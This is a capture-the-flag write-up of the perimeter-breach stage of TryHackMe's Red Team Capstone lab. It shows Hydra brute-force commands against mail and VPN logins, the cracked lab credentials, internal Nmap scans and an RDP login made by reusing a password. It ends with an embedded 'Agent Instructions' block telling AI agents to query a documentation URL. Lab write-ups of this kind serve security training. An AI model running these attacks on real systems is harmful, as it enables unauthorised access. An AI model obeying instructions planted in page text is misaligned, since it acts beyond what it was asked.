# Permieter Breach
To breach the perimeter, we target the public-facing VPN server. Given its connection to the internal network, it presents a prime opportunity for initial exploitation.
{% code overflow="wrap" %}
```bash
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone/Capstone_Challenge_Resources]
└─$ hydra -L usernames.txt -P passwords.txt mail.thereserve.loc smtp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-12 13:10:10
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10800 login tries (l:15/p:720), ~675 tries per task
[DATA] attacking smtp://mail.thereserve.loc:25/
[STATUS] 986.00 tries/min, 986 tries in 00:01h, 9814 to do in 00:10h, 16 active
[STATUS] 1009.67 tries/min, 3029 tries in 00:03h, 7771 to do in 00:08h, 16 active
[25][smtp] host: mail.thereserve.loc login: laura.wood@corp.thereserve.loc password: Password1@
[STATUS] 1109.14 tries/min, 7764 tries in 00:07h, 3036 to do in 00:03h, 16 active
[25][smtp] host: mail.thereserve.loc login: mohammad.ahmed@corp.thereserve.loc password: Password1!
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-12 13:19:33
```
{% endcode %}
We can reuse the same username and password lists to perform a brute-force attack on the VPN login as well.
{% code overflow="wrap" %}
```bash
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone/Capstone_Challenge_Resources]
└─$ hydra -L usernames.txt -P passwords.txt vpn.thereserve.loc http-get-form "/login.php:user=^USER^&password=^PASS^:Please check your username or password" -v
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-12 13:10:02
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10800 login tries (l:15/p:720), ~675 tries per task
[DATA] attacking http-get-form://vpn.thereserve.loc:80/login.php:user=^USER^&password=^PASS^:Please check your username or password
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[STATUS] 944.00 tries/min, 944 tries in 00:01h, 9856 to do in 00:11h, 16 active
[STATUS] 964.67 tries/min, 2894 tries in 00:03h, 7906 to do in 00:09h, 16 active
[VERBOSE] Page redirected to http[s]://vpn.thereserve.loc:80/vpncontrol.php
[80][http-get-form] host: vpn.thereserve.loc login: laura.wood@corp.thereserve.loc password: Password1@
[STATUS] 1058.43 tries/min, 7409 tries in 00:07h, 3391 to do in 00:04h, 16 active
[VERBOSE] Page redirected to http[s]://vpn.thereserve.loc:80/vpncontrol.php
[80][http-get-form] host: vpn.thereserve.loc login: mohammad.ahmed@corp.thereserve.loc password: Password1!
[STATUS] attack finished for vpn.thereserve.loc (waiting for children to complete tests)
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-12 13:19:52
```
{% endcode %}
## Breach
With these accounts, we can attempt to log into the webmail application, the VPN server (to obtain a VPN file assigned to the users), and, if fortunate, potentially gain **Active Directory** credentials. Ignoring the potential MySQL vulnerabilities for now, we focus on the webmail login.
After successfully logging into both accounts, we find that, unfortunately, nothing useful is located in the mailboxes.
Upon examining the VPN server, we successfully log in and retrieve two \`.ovpn\` files. The form prompts us to submit an account name. On login, it’s pre-filled with \`\`. Testing with my own name in the same format also works successfully.
At the start of the challenge, during the first attempt, the routes were configured correctly, allowing us to successfully reach the internal network IPs `10.200.XXX.21` and `10.200.XXX.22`, both of which are `WRK` machines within the internal network.
## WRKX Recon (10.200.XXX.21, 10.200.XXX.22)
Scanning those reveals their FQDN `WRK_.corp.thereserve.loc` and they have an open `RDP` port `3389`.
An interesting observation is that both machines have `Remote Desktop Protocol (RDP, port 3389)` open. This suggests that we may be able to log in using the same credentials as their `Active Directory accounts` if they are consistent.
{% code overflow="wrap" %}
```bash
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone]
└─$ nmap -sC -sV -Pn 10.200.118.21 -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 13:27 IST
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 0.80% done
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 3.45% done; ETC: 13:29 (0:01:52 remaining)
Nmap scan report for 10.200.118.21
Host is up (0.36s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 21:78:e2:79:d3:93:ee:f9:aa:70:94:ec:01:b3:a5:8f (RSA)
| 256 e0:f7:b6:67:c9:93:b5:74:0f:0a:83:ff:ef:55:c8:9a (ECDSA)
|_ 256 bd:83:0c:e3:b4:4f:78:f2:e3:4a:52:03:3c:a5:ce:58 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-11-12T07:59:32+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=WRK1.corp.thereserve.loc
| Not valid before: 2024-11-06T10:50:27
|_Not valid after: 2025-05-08T10:50:27
| rdp-ntlm-info:
| Target_Name: CORP
| NetBIOS_Domain_Name: CORP
| NetBIOS_Computer_Name: WRK1
| DNS_Domain_Name: corp.thereserve.loc
| DNS_Computer_Name: WRK1.corp.thereserve.loc
| DNS_Tree_Name: thereserve.loc
| Product_Version: 10.0.17763
|_ System_Time: 2024-11-12T07:58:54+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-11-12T07:58:56
|_ start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
```
{% endcode %}
{% code overflow="wrap" %}
```bash
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone]
└─$ nmap -sC -sV -Pn 10.200.118.22 -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 14:16 IST
Nmap scan report for 10.200.118.22
Host is up (0.38s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 e6:f0:fb:5b:24:28:68:13:da:dd:c5:5f:67:4e:be:4f (RSA)
| 256 93:f5:8f:4c:31:15:fc:8e:38:03:3e:d5:b7:1c:ed:d3 (ECDSA)
|_ 256 56:3f:8a:33:a4:1f:dc:11:9a:a1:67:a6:7d:f8:76:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WRK2.corp.thereserve.loc
| Not valid before: 2024-11-06T10:50:34
|_Not valid after: 2025-05-08T10:50:34
|_ssl-date: 2024-11-12T08:48:10+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: CORP
| NetBIOS_Domain_Name: CORP
| NetBIOS_Computer_Name: WRK2
| DNS_Domain_Name: corp.thereserve.loc
| DNS_Computer_Name: WRK2.corp.thereserve.loc
| DNS_Tree_Name: thereserve.loc
| Product_Version: 10.0.17763
|_ System_Time: 2024-11-12T08:47:31+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-11-12T08:47:32
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.49 seconds
```
{% endcode %}
## Internal Network Recon
Let's attempt to find other hosts with RDP enabled on the network by using Nmap with the following command:
```bash
nmap -p 3389 -Pn 10.200.XXX.1-254 --open
```
Replace `XXX` with the appropriate subnet. This command will help us identify any other machines with **RDP (port 3389)** open.
{% code overflow="wrap" %}
```bash
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone]
└─$ nmap -p 3389 -Pn 10.200.118.1-254 --open
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 14:22 IST
Nmap scan report for mail.thereserve.loc (10.200.118.11)
Host is up (0.27s latency).
PORT STATE SERVICE
3389/tcp open ms-wbt-server
Nmap scan report for 10.200.118.21
Host is up (0.27s latency).
PORT STATE SERVICE
3389/tcp open ms-wbt-server
Nmap scan report for 10.200.118.101
Host is up (0.27s latency).
PORT STATE SERVICE
3389/tcp open ms-wbt-server
Nmap done: 254 IP addresses (254 hosts up) scanned in 8.42 seconds
```
{% endcode %}
Let's attempt to find other hosts with HTTP enabled on the network by using Nmap with the following command:
{% code overflow="wrap" %}
```bash
nmap -p 80,443 -Pn 10.200.XXX.1-254 --open
```
{% endcode %}
Replace `XXX` with the appropriate subnet. This command will help us identify any other machines with **RDP (port 3389)** open.
{% code overflow="wrap" %}
```bash
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone]
└─$ nmap -p 80,443 -Pn 10.200.118.1-254 --open
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 14:23 IST
Stats: 0:00:11 elapsed; 0 hosts completed (254 up), 254 undergoing Connect Scan
Connect Scan Timing: About 11.22% done; ETC: 14:24 (0:01:27 remaining)
Nmap scan report for mail.thereserve.loc (10.200.118.11)
Host is up (0.30s latency).
Not shown: 1 closed tcp port (conn-refused)
PORT STATE SERVICE
80/tcp open http
Nmap scan report for vpn.thereserve.loc (10.200.118.12)
Host is up (0.31s latency).
Not shown: 1 closed tcp port (conn-refused)
PORT STATE SERVICE
80/tcp open http
Nmap scan report for web.thereserve.loc (10.200.118.13)
Host is up (0.19s latency).
Not shown: 1 closed tcp port (conn-refused)
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 10.200.118.201
Host is up (0.17s latency).
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Nmap done: 254 IP addresses (254 hosts up) scanned in 27.00 seconds
```
{% endcode %}
After the scan, we identify a fourth machine with ports **80** and **443** exposed, serving an **HTTP/HTTPS** web page. When accessing the IP in the browser, the page loads with a white background, displaying no content or errors.
By checking the source code, we discover that the web page is associated with the **Swift Bank** web application, as indicated by the static links present in the JavaScript code.
After adding the hostname to the hosts file, we can now successfully access the **Swift Bank** web application.
We can also run an Nmap scan against the **Swift Bank** web application to identify any open ports and services that might be exposed.
{% code overflow="wrap" %}
```bash
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone]
└─$ nmap -sC -sV swift.bank.thereserve.loc -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 15:29 IST
Nmap scan report for swift.bank.thereserve.loc (10.200.118.201)
Host is up (0.31s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 1f:42:2d:f5:4d:c6:fa:41:b1:d9:42:5b:d2:b4:bd:2e (RSA)
| 256 7f:64:d1:9d:6a:5a:a6:6f:c1:85:ff:7a:ae:d0:39:ef (ECDSA)
|_ 256 b6:e5:97:2f:47:5d:24:2c:51:84:f0:ea:69:df:58:47 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: The Reserve Online
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp open ssl/https
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/stateOrProvinceName=Utah/countryName=US
| Not valid before: 2022-09-26T13:22:15
|_Not valid after: 2023-09-26T13:22:15
| tls-alpn:
| h2
|_ http/1.1
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Content-Type: text/plain; charset=utf-8
| Vary: Origin
| X-Content-Type-Options: nosniff
| Date: Tue, 12 Nov 2024 09:59:40 GMT
| Content-Length: 19
| page not found
| GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 404 Not Found
| Content-Type: text/plain; charset=utf-8
| Vary: Origin
| X-Content-Type-Options: nosniff
| Date: Tue, 12 Nov 2024 09:59:36 GMT
| Content-Length: 19
| page not found
| HTTPOptions:
| HTTP/1.0 404 Not Found
| Content-Type: text/plain; charset=utf-8
| Vary: Origin
| X-Content-Type-Options: nosniff
| Date: Tue, 12 Nov 2024 09:59:38 GMT
| Content-Length: 19
|_ page not found
|_http-cors: GET POST DELETE OPTIONS
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port443-TCP:V=7.94SVN%T=SSL%I=7%D=11/12%Time=67332708%P=x86_64-pc-linux
SF:-gnu%r(GetRequest,BE,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:
SF:\x20text/plain;\x20charset=utf-8\r\nVary:\x20Origin\r\nX-Content-Type-O
SF:ptions:\x20nosniff\r\nDate:\x20Tue,\x2012\x20Nov\x202024\x2009:59:36\x2
SF:0GMT\r\nContent-Length:\x2019\r\n\r\n404\x20page\x20not\x20found\n")%r(
SF:HTTPOptions,BE,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nVary:\x20Origin\r\nX-Content-Type-Options
SF::\x20nosniff\r\nDate:\x20Tue,\x2012\x20Nov\x202024\x2009:59:38\x20GMT\r
SF:\nContent-Length:\x2019\r\n\r\n404\x20page\x20not\x20found\n")%r(FourOh
SF:FourRequest,BE,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nVary:\x20Origin\r\nX-Content-Type-Options
SF::\x20nosniff\r\nDate:\x20Tue,\x2012\x20Nov\x202024\x2009:59:40\x20GMT\r
SF:\nContent-Length:\x2019\r\n\r\n404\x20page\x20not\x20found\n")%r(Generi
SF:cLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/
SF:plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Re
SF:quest")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent
SF:-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n4
SF:00\x20Bad\x20Request")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\
SF:nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\
SF:r\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20
SF:Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConn
SF:ection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,
SF:67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\
SF:x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")
SF:%r(TLSSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type
SF::\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x2
SF:0Bad\x20Request")%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r
SF:\n\r\n400\x20Bad\x20Request")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x
SF:20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnectio
SF:n:\x20close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.31 seconds
```
{% endcode %}
It seems that, for now, we are unable to do much with the application, as only ports `22`, `80`, and `443` are available.
By using `Remmina` and reusing the credentials of `laura.wood`, we successfully establish a connection to the `WRK1` machine.
## Flags 1 - 3
{% hint style="info" %}
**NOTE**: We are now able to obtain the following flags by following the instructions on the e-citizen platform:
* **Flag 1**: Breaching the Perimeter
* **Flag 2**: Breaching Active Directory
* **Flag 3**: Foothold on Corporate Division Tier 2 Infrastructure
{% endhint %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://bunring.gitbook.io/ctf-writeups/red-team-capstone-challenge-tryhackme/permieter-breach.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.